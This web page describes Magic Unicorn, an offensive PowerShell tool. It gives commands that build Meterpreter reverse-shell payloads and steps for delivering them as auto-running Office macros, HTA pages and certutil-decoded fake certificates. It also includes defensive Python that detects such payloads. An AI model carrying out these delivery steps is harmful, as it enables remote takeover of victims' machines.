PowerShell Downgrade Attack – Magic Unicorn

Last Commit: 04/27/2022

Introduction

Magic Unicorn is a simple tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory. This tool is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is very simple. You just need to make sure you’ve installed Metasploit in the right path and run Magic Unicorn. Unicorn will automatically generate a PowerShell command. Copy and paste the PowerShell code into a command line window or deliver it through a payload delivery system:

root@kali:~/Desktop# python unicorn.py

Magic Unicorn Supports:

root@kali:~/Desktop# python unicorn.py
                                                         
                                                         ,/
                                                        //
                                                      ,//
                                          ___   /|   |//
                                      `__/\_ --(/|___/-/
                                   \|\_-\___ __-_`- /-/ \.
                                  |\_-___,-\_____--/_)' ) \
                                   \ -_ /     __ \( `( __`\|
                                   `\__|      |\)\ ) /(/|
           ,._____.,            ',--//-|      \  |  '   /
          /     __. \,          / /,---|       \       /
         / /    _. \  \        `/`_/ _,'        |     |
        |  | ( (  \   |      ,/\'__/'/          |     |
        |  \  \`--, `_/_------______/           \(   )/
        | | \  \_. \,                            \___/\
        | |  \_   \  \                                 \
        \ \    \_ \   \   /                             \
         \ \  \._  \__ \_|       |                       \
          \ \___  \      \       |                        \
           \__ \__ \  \_ |       \                         |
           |  \_____ \  ____      |                        |
           | \  \__ ---' .__\     |        |               |
           \  \__ ---   /   )     |        \              /
            \   \____/ / ()(      \          `---_       /|
             \__________/(,--__    \_________.    |    ./ |
               |     \ \  `---_\--,           \   \_,./   |
               |      \  \_ ` \    /`---_______-\   \\    /
                \      \.___,`|   /              \   \\   \
                 \     |  \_ \|   \              (   |:    |
                  \    \      \    |             /  / |    ;
                   \    \      \    \          ( `_'   \  |
                    \.   \      \.   \          `__/   |  |
                      \   \       \.  \                |  |
                       \   \        \  \               (  )
                        \   |        \  |              |  |
                         |  \         \ \              I  `
                         ( __;        ( _;            ('-_';
                         |___\        \___:            \___:

aHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=

                
-------------------- Magic Unicorn Attack Vector -----------------------------

Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates

Happy Magic Unicorns.

Magic Unicorn allows native x86 powershell injection attacks on any Windows platform.

Usage:

python unicorn.py payload reverse_ipaddr port

Attack Options:

  • PowerShell Attack Instructions
  • Macro Attack Instructions
  • HTA Attack Instructions
  • Certutil Attack Instructions
  • Custom PS1 Attack Instructions

PowerShell Attack

Running the following command generates two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed to inject the PowerShell attack into memory.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

There are plenty of scenarios where you can use this attack. Simply paste the powershell_attack.txt command in any command prompt window and it will give a shell back to you.

Note: In order to capture the attack, you’ll need to enable the listener.

You can use the .rc file with Metasploit to quickly open up a listener on the port you’ve specified.

Macro Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Go to File->Properties->Ribbons, and select Developer. Now, you’ll have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.

Note: When copying and pasting into Excel, if additional spaces are added, you need to remove them after each of the PowerShell code sections under variable “x” or a syntax error will happen!

HTA Attack

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta

The HTA attack will automatically generate two files. index.html tells the browser to use launcher.hta, which contains the malicious PowerShell injection code. All files will be exported to the hta_access/ folder. Three main files:

  • index.html
  • launcher.hta
  • unicorn.rc

To launch the listener for Metasploit, run:

msfconsole -r unicorn.rc

Certutil Attack

python unicorn.py <path_to_payload/exe_encode> crt

The Certutil attack allows you to take a binary file, convert it into base64 format and use certutil on the victim machine to convert it back to a binary for you. It allows you to transfer a binary to the victim machine through a fake certificate file. To get the base64 output, just place an executable in the path of unicorn and run the following:

python unicorn.py <exe_name> crt

Files will be stored in decode_attack/ folder.
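From the defender's side, a fake certificate of this kind can be told apart from a real one by decoding it and looking at the first bytes. The following is an added example, not code from Unicorn or the original page; it assumes the file uses standard PEM certificate armor, and both samples are constructed stubs.

```python
import base64
import re
import struct

PEM_RE = re.compile(
    rb"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)

def is_pe(raw: bytes) -> bool:
    """True if raw starts with a DOS header whose e_lfanew points at the PE signature."""
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", raw, 0x3C)[0]
    return raw[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def classify_certificate_file(data: bytes) -> str:
    """Classify the payload inside PEM certificate armor: pe, der, other or no-pem."""
    match = PEM_RE.search(data)
    if not match:
        return "no-pem"
    try:
        raw = base64.b64decode(b"".join(match.group(1).split()), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return "other"
    if is_pe(raw):
        return "pe"             # executable hidden behind certificate armor
    if raw[:1] == b"\x30":
        return "der"            # ASN.1 SEQUENCE tag, as a real DER certificate has
    return "other"

def to_pem(raw: bytes) -> bytes:
    """Wrap bytes in certificate armor (used only to build the samples below)."""
    return (b"-----BEGIN CERTIFICATE-----\n" + base64.encodebytes(raw)
            + b"-----END CERTIFICATE-----\n")

# Constructed samples: a header-only PE stub (not runnable) and a DER-like stub.
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
DER_STUB = b"\x30\x82\x00\x10" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("update.crt", to_pem(FAKE_PE)), ("real.crt", to_pem(DER_STUB))]:
        print(name, "->", classify_certificate_file(blob))
```

Any file that classifies as "pe" is worth correlating with certutil decode activity on the same host.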

Custom PS1 Attack

Custom PS1 Examples:

python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.
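A detection-side view of the encoded commands described above, as an added example (not code from Unicorn or the original page): it parses process command lines, decodes any `-EncodedCommand` argument and flags a request for the 2.0 engine. That `-Version 2` is the downgrade switch and that switch names may be abbreviated are general PowerShell behaviour assumed here, not stated on the page; the sample command lines are constructed.

```python
import base64
import shlex

def flag_name(token: str) -> str:
    """Return the lower-cased switch name for '-name' or '/name', else ''."""
    return token[1:].lower() if token[:1] in ("-", "/") else ""

def inspect_command_line(cmdline: str) -> dict:
    """Flag encoded commands and engine-version downgrades in a PowerShell command line."""
    finding = {"encoded": None, "downgrade": False}
    tokens = shlex.split(cmdline, posix=False)   # posix=False keeps Windows backslashes
    if not tokens or "powershell" not in tokens[0].lower():
        return finding
    for tok, nxt in zip(tokens[1:], tokens[2:]):
        name, value = flag_name(tok), nxt.strip('"')
        if not name:
            continue
        # powershell.exe accepts any prefix of a switch name, plus the alias -ec
        if "encodedcommand".startswith(name) or name == "ec":
            try:
                finding["encoded"] = base64.b64decode(
                    value, validate=True).decode("utf-16-le")
            except ValueError:               # bad base64 or not UTF-16LE text
                finding["encoded"] = "<undecodable>"
        elif "version".startswith(name) and value.startswith("2"):
            finding["downgrade"] = True      # asks for the 2.0 engine
    return finding

# Constructed sample command lines (the encoded script is a harmless Write-Output).
B64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLES = [
    f"powershell.exe -NoP -w hidden -enc {B64}",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Version 2 -Command Get-Date",
    "powershell.exe -ExecutionPolicy Bypass -File build.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_command_line(line))
```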

Other:

  • DDE Office COM Attack
  • Import Cobalt Strike Beacon
  • Custom Shellcode Generation Method
  • SettingContent-ms Extension Method

For more details and instructions, check the Unicorn GitHub repository page.